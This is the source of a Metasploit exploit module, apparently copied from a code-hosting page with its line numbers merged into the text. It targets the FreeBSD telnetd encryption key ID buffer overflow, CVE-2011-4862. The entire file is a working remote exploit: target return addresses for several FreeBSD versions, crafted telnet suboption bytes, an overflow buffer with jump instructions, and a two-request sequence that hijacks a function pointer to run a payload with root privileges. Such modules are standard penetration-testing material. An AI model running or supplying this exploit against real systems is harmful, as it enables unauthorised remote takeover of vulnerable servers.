Path: blob/master/modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb
19670 views
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67class MetasploitModule < Msf::Exploit::Remote8Rank = GreatRanking910include Msf::Exploit::Remote::Telnet11include Msf::Exploit::BruteTargets1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',18'Description' => %q{19This module exploits a buffer overflow in the encryption option handler of the20FreeBSD telnet service.21},22'Author' => [23'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>',24'Brandon Perry <bperry.volatile[at]gmail.com>',25'Dan Rosenberg',26'hdm'27],28'License' => MSF_LICENSE,29'References' => [30['CVE', '2011-4862'],31['OSVDB', '78020'],32['BID', '51182'],33['EDB', '18280']34],35'Privileged' => true,36'Platform' => 'bsd',37'Arch' => [ ARCH_X86 ],38'Payload' => {39'Space' => 128,40'BadChars' => "\x00"41},4243'Targets' => [44[ 'Automatic', {} ],45[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx46[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx47[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx48[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx49[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx50[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx51[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx52[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx53# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)54[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return55# Versions 5.2 and below do not support encyption56],57'DefaultTarget' => 0,58'DisclosureDate' => '2011-12-23',59'Notes' => {60'Stability' => [ CRASH_SERVICE_RESTARTS, ],61'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ],62'Reliability' => [ REPEATABLE_SESSION, ]63}64)65)66end6768def exploit_target(target)69connect70banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)71vprint_status(banner_sanitized)7273enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"74enc_keyid = "\xff\xfa\x26\x07"75end_suboption = "\xff\xf0"7677# Telnet protocol requires 0xff to be escaped with another78penc = payload.encoded.gsub("\xff", "\xff\xff")7980key_id = Rex::Text.rand_text_alphanumeric(400)81key_id[0, 2] = "\xeb\x76"82key_id[72, 4] = [ target['Ret'] - 20 ].pack('V')83key_id[76, 4] = [ target['Ret'] ].pack('V')8485# Some of these bytes can get mangled, jump over them86key_id[80, 112] = Rex::Text.rand_text_alphanumeric(112)8788# Bounce to the real payload (avoid corruption)89key_id[120, 2] = "\xeb\x46"9091# The actual payload92key_id[192, penc.length] = penc9394# Create the Key ID command95sploit = enc_keyid + key_id + end_suboption9697# Initiate encryption98sock.put(enc_init)99100# Wait for a successful response101loop do102data = begin103sock.get_once(-1, 5)104rescue StandardError105nil106end107if !data108fail_with(Failure::Unknown, 'This system does not support encryption')109end110break if data.index("\xff\xfa\x26\x02\x01")111end112113# The first request smashes the pointer114print_status('Sending first payload')115sock.put(sploit)116117# Make sure the server replied to the first request118data = sock.get_once(-1, 5)119unless data120print_status('Server did not respond to first payload')121return122end123124# Some delay between each request seems necessary in some cases125::IO.select(nil, nil, nil, 0.5)126127# The second request results in the pointer being called128print_status('Sending second payload...')129sock.put(sploit)130131handler132133::IO.select(nil, nil, nil, 0.5)134disconnect135end136end137138139